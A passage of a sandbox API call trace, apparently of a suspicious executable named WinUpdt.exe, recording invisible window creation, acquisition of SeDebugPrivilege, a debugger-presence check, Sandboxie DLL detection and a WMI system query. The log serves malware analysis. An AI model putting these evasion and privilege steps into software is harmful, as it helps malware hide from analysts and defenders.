lpRect=0x39e464 | out: lpRect=0x39e464) returned 1 [0035.519] RedrawWindow (hWnd=0x50116, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0035.519] GetSystemMenu (hWnd=0x50116, bRevert=0) returned 0x50247 [0035.519] GetWindowPlacement (in: hWnd=0x50116, lpwndpl=0x39e73c | out: lpwndpl=0x39e73c) returned 1 [0035.519] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0035.519] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0035.519] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0035.519] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0035.519] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0035.524] SetLayeredWindowAttributes (hwnd=0x50116, crKey=0x0, bAlpha=0x0, dwFlags=0x2) returned 1 [0035.529] GetCurrentThreadId () returned 0x8f8 [0035.536] EnumThreadWindows (dwThreadId=0x8f8, lpfn=0x4b50916, lParam=0x50116) returned 1 [0035.561] GetWindowLongW (hWnd=0x60106, nIndex=-8) returned 0 [0035.561] GetWindowLongW (hWnd=0x50116, nIndex=-8) returned 0 [0035.561] GetWindowLongW (hWnd=0x50114, nIndex=-8) returned 327958 [0035.599] SetWindowLongW (hWnd=0x50114, nIndex=-8, dwNewLong=0) returned 327958 [0035.601] GetParent (hWnd=0x50116) returned 0x0 [0035.601] GetWindowLongW (hWnd=0x50116, nIndex=-20) returned 852352 [0035.601] DestroyWindow (hWnd=0x50116) returned 1 [0035.601] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0035.607] GetWindowTextLengthW (hWnd=0x50116) returned 9 [0035.607] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0035.607] GetSystemMetrics (nIndex=42) returned 0 [0035.607] GetWindowTextW (in: hWnd=0x50116, lpString=0x39e2c4, nMaxCount=10 | out: lpString="no reason") returned 9 [0035.607] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0xd, wParam=0xa, lParam=0x39e2c4) returned 0x9 [0035.607] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0035.608] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0035.609] GetCurrentActCtx (in: lphActCtx=0x39e69c | out: lphActCtx=0x39e69c*=0x79ad44) returned 1 [0035.609] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x747d0000 [0035.609] GetModuleHandleW (lpModuleName=0x0) returned 0xe90000 [0035.609] CreateWindowExW (dwExStyle=0x90080, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName="no reason", dwStyle=0x2cf0000, X=125, Y=125, nWidth=164, nHeight=91, hWndParent=0x0, hMenu=0x0, hInstance=0xe90000, lpParam=0x0) returned 0x40162 [0035.609] SetWindowLongW (hWnd=0x40162, nIndex=-4, dwNewLong=2009540061) returned 78972966 [0035.609] GetWindowLongW (hWnd=0x40162, nIndex=-4) returned 2009540061 [0035.609] SetWindowLongW (hWnd=0x40162, nIndex=-4, dwNewLong=78973246) returned 2009540061 [0035.610] GetWindowLongW (hWnd=0x40162, nIndex=-4) returned 78973246 [0035.610] GetWindowLongW (hWnd=0x40162, nIndex=-16) returned 114229248 [0035.610] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x81, wParam=0x0, lParam=0x39e130) returned 0x1 [0035.610] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x83, wParam=0x0, lParam=0x39e11c) returned 0x0 [0035.610] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x1, wParam=0x0, lParam=0x39e130) returned 0x0 [0035.610] GetClientRect (in: hWnd=0x40162, lpRect=0x39de68 | out: lpRect=0x39de68) returned 1 [0035.610] GetWindowRect (in: hWnd=0x40162, lpRect=0x39de68 | out: lpRect=0x39de68) returned 1 [0035.610] SetWindowTextW (hWnd=0x40162, lpString="no reason") returned 1 [0035.610] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xc, wParam=0x0, lParam=0x22dcca4) returned 0x1 [0035.611] SetLayeredWindowAttributes (hwnd=0x40162, crKey=0x0, bAlpha=0x0, dwFlags=0x2) returned 1 [0035.611] GetStartupInfoW (in: lpStartupInfo=0x22dcf7c | out: lpStartupInfo=0x22dcf7c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WinUpdt.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0035.612] GetParent (hWnd=0x40162) returned 0x0 [0035.612] GetStockObject (i=5) returned 0x1900015 [0035.612] GetModuleHandleW (lpModuleName=0x0) returned 0xe90000 [0035.612] CoTaskMemAlloc (cb=0x5c) returned 0x79e928 [0035.612] RegisterClassW (lpWndClass=0x39e57c) returned 0xc164 [0035.612] CoTaskMemFree (pv=0x79e928) [0035.612] GetModuleHandleW (lpModuleName=0x0) returned 0xe90000 [0035.612] CreateWindowExW (dwExStyle=0x80, lpClassName="WindowsForms10.Window.0.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xe90000, lpParam=0x0) returned 0x3015c [0035.613] SetWindowLongW (hWnd=0x3015c, nIndex=-4, dwNewLong=2009540061) returned 78973286 [0035.613] GetWindowLongW (hWnd=0x3015c, nIndex=-4) returned 2009540061 [0035.613] SetWindowLongW (hWnd=0x3015c, nIndex=-4, dwNewLong=78973326) returned 2009540061 [0035.613] GetWindowLongW (hWnd=0x3015c, nIndex=-4) returned 78973326 [0035.613] GetWindowLongW (hWnd=0x3015c, nIndex=-16) returned 79691776 [0035.614] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x3015c, Msg=0x24, wParam=0x0, lParam=0x39e164) returned 0x0 [0035.614] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x3015c, Msg=0x81, wParam=0x0, lParam=0x39e158) returned 0x1 [0035.614] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x3015c, Msg=0x83, wParam=0x0, lParam=0x39e144) returned 0x0 [0035.615] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x3015c, Msg=0x1, wParam=0x0, lParam=0x39e158) returned 0x0 [0035.615] SetWindowLongW (hWnd=0x40162, nIndex=-8, dwNewLong=196956) returned 0 [0035.615] SendMessageW (hWnd=0x40162, Msg=0x80, wParam=0x0, lParam=0x90167) returned 0x0 [0035.615] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x80, wParam=0x0, lParam=0x90167) returned 0x0 [0035.615] SendMessageW (hWnd=0x40162, Msg=0x80, wParam=0x1, lParam=0x90185) returned 0x0 [0035.615] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x80, wParam=0x1, lParam=0x90185) returned 0x0 [0035.616] GetSystemMenu (hWnd=0x40162, bRevert=0) returned 0x60247 [0035.616] GetWindowPlacement (in: hWnd=0x40162, lpwndpl=0x39e6ac | out: lpwndpl=0x39e6ac) returned 1 [0035.616] EnableMenuItem (hMenu=0x60247, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0035.616] EnableMenuItem (hMenu=0x60247, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0035.616] EnableMenuItem (hMenu=0x60247, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0035.616] EnableMenuItem (hMenu=0x60247, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0035.616] EnableMenuItem (hMenu=0x60247, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0035.616] GetClientRect (in: hWnd=0x40162, lpRect=0x39e6f0 | out: lpRect=0x39e6f0) returned 1 [0035.616] GetClientRect (in: hWnd=0x40162, lpRect=0x39e650 | out: lpRect=0x39e650) returned 1 [0035.616] GetWindowRect (in: hWnd=0x40162, lpRect=0x39e650 | out: lpRect=0x39e650) returned 1 [0035.616] SetWindowPos (hWnd=0x40162, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x57) returned 1 [0035.616] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x46, wParam=0x0, lParam=0x39e5b8) returned 0x0 [0035.619] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0035.620] GetWindowPlacement (in: hWnd=0x40162, lpwndpl=0x39e380 | out: lpwndpl=0x39e380) returned 1 [0035.620] GetClientRect (in: hWnd=0x40162, lpRect=0x39e32c | out: lpRect=0x39e32c) returned 1 [0035.620] GetWindowTextLengthW (hWnd=0x40162) returned 9 [0035.620] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0035.620] GetSystemMetrics (nIndex=42) returned 0 [0035.620] GetWindowTextW (in: hWnd=0x40162, lpString=0x39e1f0, nMaxCount=10 | out: lpString="no reason") returned 9 [0035.620] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xd, wParam=0xa, lParam=0x39e1f0) returned 0x9 [0035.620] GetClientRect (in: hWnd=0x40162, lpRect=0x39e234 | out: lpRect=0x39e234) returned 1 [0035.621] GetSysColor (nIndex=10) returned 0xb4b4b4 [0035.621] GetSysColor (nIndex=2) returned 0xd1b499 [0035.621] GetSysColor (nIndex=9) returned 0x0 [0035.621] GetSysColor (nIndex=12) returned 0xababab [0035.621] GetSysColor (nIndex=15) returned 0xf0f0f0 [0035.621] GetSysColor (nIndex=20) returned 0xffffff [0035.621] GetSysColor (nIndex=16) returned 0xa0a0a0 [0035.621] GetSysColor (nIndex=15) returned 0xf0f0f0 [0035.621] GetSysColor (nIndex=16) returned 0xa0a0a0 [0035.621] GetSysColor (nIndex=21) returned 0x696969 [0035.621] GetSysColor (nIndex=22) returned 0xe3e3e3 [0035.621] GetSysColor (nIndex=20) returned 0xffffff [0035.621] GetSysColor (nIndex=18) returned 0x0 [0035.621] GetSysColor (nIndex=1) returned 0x0 [0035.621] GetSysColor (nIndex=27) returned 0xead1b9 [0035.621] GetSysColor (nIndex=28) returned 0xf2e4d7 [0035.621] GetSysColor (nIndex=17) returned 0x6d6d6d [0035.621] GetSysColor (nIndex=13) returned 0xff9933 [0035.621] GetSysColor (nIndex=14) returned 0xffffff [0035.621] GetSysColor (nIndex=26) returned 0xcc6600 [0035.621] GetSysColor (nIndex=11) returned 0xfcf7f4 [0035.621] GetSysColor (nIndex=3) returned 0xdbcdbf [0035.621] GetSysColor (nIndex=19) returned 0x544e43 [0035.621] GetSysColor (nIndex=24) returned 0xe1ffff [0035.621] GetSysColor (nIndex=23) returned 0x0 [0035.621] GetSysColor (nIndex=4) returned 0xf0f0f0 [0035.621] GetSysColor (nIndex=30) returned 0xf0f0f0 [0035.621] GetSysColor (nIndex=29) returned 0xff9933 [0035.622] GetSysColor (nIndex=7) returned 0x0 [0035.622] GetSysColor (nIndex=0) returned 0xc8c8c8 [0035.622] GetSysColor (nIndex=5) returned 0xffffff [0035.622] GetSysColor (nIndex=6) returned 0x646464 [0035.622] GetSysColor (nIndex=8) returned 0x0 [0035.623] GetSystemMetrics (nIndex=80) returned 1 [0035.624] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4b509b6, dwData=0x0) returned 1 [0035.625] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x39de9c | out: lpmi=0x39de9c) returned 1 [0035.625] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x2001025d [0035.626] GetDeviceCaps (hdc=0x2001025d, index=12) returned 32 [0035.626] GetDeviceCaps (hdc=0x2001025d, index=14) returned 1 [0035.626] DeleteDC (hdc=0x2001025d) returned 1 [0035.626] GetCurrentObject (hdc=0x40109b8, type=0x1) returned 0x1b00017 [0035.626] GetCurrentObject (hdc=0x40109b8, type=0x2) returned 0x1900010 [0035.626] GetCurrentObject (hdc=0x40109b8, type=0x7) returned 0x2c05025e [0035.626] GetCurrentObject (hdc=0x40109b8, type=0x6) returned 0x18a002e [0035.626] SaveDC (hdc=0x40109b8) returned 1 [0035.627] GetNearestColor (hdc=0x40109b8, color=0xf0f0f0) returned 0xf0f0f0 [0035.628] CreateSolidBrush (color=0xf0f0f0) returned 0x1b1001d9 [0035.628] FillRect (hDC=0x40109b8, lprc=0x39e0d4, hbr=0x1b1001d9) returned 1 [0035.630] DeleteObject (ho=0x1b1001d9) returned 1 [0035.630] RestoreDC (hdc=0x40109b8, nSavedDC=-1) returned 1 [0035.631] GetWindowPlacement (in: hWnd=0x40162, lpwndpl=0x39e368 | out: lpwndpl=0x39e368) returned 1 [0035.631] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x47, wParam=0x0, lParam=0x39e5b8) returned 0x0 [0035.631] GetClientRect (in: hWnd=0x40162, lpRect=0x39e318 | out: lpRect=0x39e318) returned 1 [0035.631] GetWindowRect (in: hWnd=0x40162, lpRect=0x39e318 | out: lpRect=0x39e318) returned 1 [0035.631] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x83, wParam=0x1, lParam=0x39e19c) returned 0x0 [0035.633] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0035.634] GetWindowPlacement (in: hWnd=0x40162, lpwndpl=0x39df8c | out: lpwndpl=0x39df8c) returned 1 [0035.634] GetClientRect (in: hWnd=0x40162, lpRect=0x39df38 | out: lpRect=0x39df38) returned 1 [0035.634] GetWindowTextLengthW (hWnd=0x40162) returned 9 [0035.634] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0035.634] GetSystemMetrics (nIndex=42) returned 0 [0035.634] GetWindowTextW (in: hWnd=0x40162, lpString=0x39ddfc, nMaxCount=10 | out: lpString="no reason") returned 9 [0035.634] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xd, wParam=0xa, lParam=0x39ddfc) returned 0x9 [0035.635] GetClientRect (in: hWnd=0x40162, lpRect=0x39de40 | out: lpRect=0x39de40) returned 1 [0035.635] GetCurrentObject (hdc=0x3401079c, type=0x1) returned 0x1b00017 [0035.635] GetCurrentObject (hdc=0x3401079c, type=0x2) returned 0x1900010 [0035.635] GetCurrentObject (hdc=0x3401079c, type=0x7) returned 0x2c05025e [0035.635] GetCurrentObject (hdc=0x3401079c, type=0x6) returned 0x18a002e [0035.635] SaveDC (hdc=0x3401079c) returned 1 [0035.635] GetNearestColor (hdc=0x3401079c, color=0xf0f0f0) returned 0xf0f0f0 [0035.635] CreateSolidBrush (color=0xf0f0f0) returned 0x1c1001d9 [0035.635] FillRect (hDC=0x3401079c, lprc=0x39dce0, hbr=0x1c1001d9) returned 1 [0035.635] DeleteObject (ho=0x1c1001d9) returned 1 [0035.635] RestoreDC (hdc=0x3401079c, nSavedDC=-1) returned 1 [0035.635] SetWindowLongW (hWnd=0x40162, nIndex=-8, dwNewLong=196956) returned 196956 [0035.635] SendMessageW (hWnd=0x3015c, Msg=0x80, wParam=0x1, lParam=0x90185) returned 0x0 [0035.635] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x3015c, Msg=0x80, wParam=0x1, lParam=0x90185) returned 0x0 [0035.636] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x3015c, Msg=0xd, wParam=0x104, lParam=0x499c610) returned 0x0 [0035.636] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x3015c, Msg=0xd, wParam=0x104, lParam=0x499c610) returned 0x0 [0035.636] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x747d0000 [0035.636] GetWindowLongW (hWnd=0x40162, nIndex=-16) returned 382664704 [0035.636] GetWindowTextLengthW (hWnd=0x40162) returned 9 [0035.636] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0035.636] GetSystemMetrics (nIndex=42) returned 0 [0035.637] GetWindowTextW (in: hWnd=0x40162, lpString=0x39e5e8, nMaxCount=10 | out: lpString="no reason") returned 9 [0035.637] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xd, wParam=0xa, lParam=0x39e5e8) returned 0x9 [0035.637] GetWindowTextLengthW (hWnd=0x40162) returned 9 [0035.637] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0035.637] GetSystemMetrics (nIndex=42) returned 0 [0035.637] GetWindowTextW (in: hWnd=0x40162, lpString=0x39e5e8, nMaxCount=10 | out: lpString="no reason") returned 9 [0035.637] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xd, wParam=0xa, lParam=0x39e5e8) returned 0x9 [0035.637] GetWindowLongW (hWnd=0x40162, nIndex=-16) returned 382664704 [0035.637] GetWindowLongW (hWnd=0x40162, nIndex=-20) returned 590208 [0035.637] SetWindowLongW (hWnd=0x40162, nIndex=-16, dwNewLong=315555840) returned 382664704 [0035.637] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x7c, wParam=0xfffffff0, lParam=0x39e644) returned 0x0 [0035.637] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x7d, wParam=0xfffffff0, lParam=0x39e644) returned 0x0 [0035.637] SetWindowLongW (hWnd=0x40162, nIndex=-20, dwNewLong=589952) returned 590208 [0035.637] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x7c, wParam=0xffffffec, lParam=0x39e644) returned 0x0 [0035.637] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x7d, wParam=0xffffffec, lParam=0x39e644) returned 0x0 [0035.638] SetWindowPos (hWnd=0x40162, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0035.638] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x46, wParam=0x0, lParam=0x39e664) returned 0x0 [0035.638] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x83, wParam=0x1, lParam=0x39e63c) returned 0x0 [0035.640] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0035.641] GetWindowPlacement (in: hWnd=0x40162, lpwndpl=0x39e42c | out: lpwndpl=0x39e42c) returned 1 [0035.641] GetClientRect (in: hWnd=0x40162, lpRect=0x39e3d8 | out: lpRect=0x39e3d8) returned 1 [0035.641] GetWindowTextLengthW (hWnd=0x40162) returned 9 [0035.641] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0035.641] GetSystemMetrics (nIndex=42) returned 0 [0035.641] GetWindowTextW (in: hWnd=0x40162, lpString=0x39e29c, nMaxCount=10 | out: lpString="no reason") returned 9 [0035.641] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xd, wParam=0xa, lParam=0x39e29c) returned 0x9 [0035.641] GetClientRect (in: hWnd=0x40162, lpRect=0x39e2e0 | out: lpRect=0x39e2e0) returned 1 [0035.641] GetCurrentObject (hdc=0x1701025f, type=0x1) returned 0x1b00017 [0035.641] GetCurrentObject (hdc=0x1701025f, type=0x2) returned 0x1900010 [0035.641] GetCurrentObject (hdc=0x1701025f, type=0x7) returned 0x2c05025e [0035.641] GetCurrentObject (hdc=0x1701025f, type=0x6) returned 0x18a002e [0035.641] SaveDC (hdc=0x1701025f) returned 1 [0035.641] GetNearestColor (hdc=0x1701025f, color=0xf0f0f0) returned 0xf0f0f0 [0035.641] CreateSolidBrush (color=0xf0f0f0) returned 0x1d1001d9 [0035.641] FillRect (hDC=0x1701025f, lprc=0x39e180, hbr=0x1d1001d9) returned 1 [0035.642] DeleteObject (ho=0x1d1001d9) returned 1 [0035.642] RestoreDC (hdc=0x1701025f, nSavedDC=-1) returned 1 [0035.642] GetWindowPlacement (in: hWnd=0x40162, lpwndpl=0x39e414 | out: lpwndpl=0x39e414) returned 1 [0035.642] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0x47, wParam=0x0, lParam=0x39e664) returned 0x0 [0035.642] GetClientRect (in: hWnd=0x40162, lpRect=0x39e3c4 | out: lpRect=0x39e3c4) returned 1 [0035.642] GetWindowRect (in: hWnd=0x40162, lpRect=0x39e3c4 | out: lpRect=0x39e3c4) returned 1 [0035.642] RedrawWindow (hWnd=0x40162, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0035.642] GetSystemMenu (hWnd=0x40162, bRevert=0) returned 0x60247 [0035.642] GetWindowPlacement (in: hWnd=0x40162, lpwndpl=0x39e69c | out: lpwndpl=0x39e69c) returned 1 [0035.642] EnableMenuItem (hMenu=0x60247, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0035.642] EnableMenuItem (hMenu=0x60247, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0035.642] EnableMenuItem (hMenu=0x60247, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0035.642] EnableMenuItem (hMenu=0x60247, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0035.642] EnableMenuItem (hMenu=0x60247, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0035.642] SetWindowLongW (hWnd=0x50114, nIndex=-8, dwNewLong=262498) returned 393478 [0035.718] GetCurrentProcessId () returned 0x8e8 [0035.722] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x39e07c | out: lpLuid=0x39e07c*(LowPart=0x14, HighPart=0)) returned 1 [0035.723] GetCurrentProcess () returned 0xffffffff [0035.723] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x39e078 | out: TokenHandle=0x39e078*=0x240) returned 1 [0035.724] AdjustTokenPrivileges (in: TokenHandle=0x240, DisableAllPrivileges=0, NewState=0x22de4a4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0035.724] CloseHandle (hObject=0x240) returned 1 [0035.724] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x8e8) returned 0x240 [0035.725] GetExitCodeProcess (in: hProcess=0x240, lpExitCode=0x22de430 | out: lpExitCode=0x22de430*=0x103) returned 1 [0035.731] CheckRemoteDebuggerPresent (in: hProcess=0x240, pbDebuggerPresent=0x39e7d4 | out: pbDebuggerPresent=0x39e7d4) returned 1 [0035.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SbieDll.dll", cchWideChar=11, lpMultiByteStr=0x39e774, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SbieDll.dlltëQ\x17", lpUsedDefaultChar=0x0) returned 11 [0035.744] GetModuleHandleA (lpModuleName="SbieDll.dll") returned 0x0 [0036.449] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x250 [0036.450] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x254 [0036.459] SetEvent (hEvent=0x254) returned 1 [0036.460] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x39e6dc*=0x250, lpdwindex=0x39e4fc | out: lpdwindex=0x39e4fc) returned 0x0 [0037.273] CoGetContextToken (in: pToken=0x39e5a8 | out: pToken=0x39e5a8) returned 0x0 [0037.273] CoGetContextToken (in: pToken=0x39e508 | out: pToken=0x39e508) returned 0x0 [0037.273] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800820, riid=0x39e5d8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x39e5d4 | out: ppvObject=0x39e5d4*=0x8800820) returned 0x0 [0037.274] WbemDefPath:IUnknown:AddRef (This=0x8800820) returned 0x3 [0037.274] WbemDefPath:IUnknown:Release (This=0x8800820) returned 0x2 [0037.278] WbemDefPath:IWbemPath:SetText (This=0x8800820, uMode=0x4, pszPath="Win32_OperatingSystem") returned 0x0 [0037.278] WbemDefPath:IWbemPath:GetInfo (in: This=0x8800820, uRequestedInfo=0x0, puResponse=0x39e788 | out: puResponse=0x39e788*=0xc15) returned 0x0 [0037.278] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x8800820, puCount=0x39e780 | out: puCount=0x39e780*=0x0) returned 0x0 [0037.280] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2b4 [0037.280] SetEvent (hEvent=0x254) returned 1 [0037.280] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x39dfdc*=0x2b4, lpdwindex=0x39ddfc | out: lpdwindex=0x39ddfc) returned 0x0 [0037.282] CoGetContextToken (in: pToken=0x39dea8 | out: pToken=0x39dea8) returned 0x0 [0037.282] CoGetContextToken (in: pToken=0x39de08 | out: pToken=0x39de08) returned 0x0 [0037.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x8800998, riid=0x39ded8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x39ded4 | out: ppvObject=0x39ded4*=0x8800998) returned 0x0 [0037.282] WbemDefPath:IUnknown:AddRef (This=0x8800998) returned 0x3 [0037.282] WbemDefPath:IUnknown:Release (This=0x8800998) returned 0x2 [0037.282] WbemDefPath:IWbemPath:SetText (This=0x8800998, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0037.282] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x8800998, puCount=0x39e758 | out: puCount=0x39e758*=0x2) returned 0x0 [0037.282] WbemDefPath:IWbemPath:GetText (in: This=0x8800998, lFlags=4, puBuffLength=0x39e754*=0x0, pszText=0x0 | out: puBuffLength=0x39e754*=0xf, pszText=0x0) returned 0x0 [0037.283] WbemDefPath:IWbemPath:GetText (in: This=0x8800998, lFlags=4, puBuffLength=0x39e754*=0xf, pszText="00000000000000" | out: puBuffLength=0x39e754*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0037.290] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x39e5f4*=0x2c8, lpdwindex=0x39e4a4 | out: lpdwindex=0x39e4a4) returned 0x0 [0042.104] CoGetContextToken (in: pToken=0x39e3b0 | out: pToken=0x39e3b0) returned 0x0 [0042.104] CoGetContextToken (in: pToken=0x39e358 | out: pToken=0x39e358) returned 0x0 [0042.104] IUnknown:QueryInterface (in: This=0x78c4f0, riid=0x74aa3c98*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e338 | out: ppvObject=0x39e338*=0x78c500) returned 0x0 [0042.105] CObjectContext::ContextCallback () returned 0x0 [0042.109] BeginPaint (in: hWnd=0x40162, lpPaint=0x39d5f4 | out: lpPaint=0x39d5f4) returned 0x1701025f [0042.110] GetWindowPlacement (in: hWnd=0x40162, lpwndpl=0x39d350 | out: lpwndpl=0x39d350) returned 1 [0042.110] GetClientRect (in: hWnd=0x40162, lpRect=0x39d2fc | out: lpRect=0x39d2fc) returned 1 [0042.110] GetWindowTextLengthW (hWnd=0x40162) returned 9 [0042.110] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0042.110] GetSystemMetrics (nIndex=42) returned 0 [0042.110] GetWindowTextW (in: hWnd=0x40162, lpString=0x39d1c0, nMaxCount=10 | out: lpString="no reason") returned 9 [0042.110] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xd, wParam=0xa, lParam=0x39d1c0) returned 0x9 [0042.111] 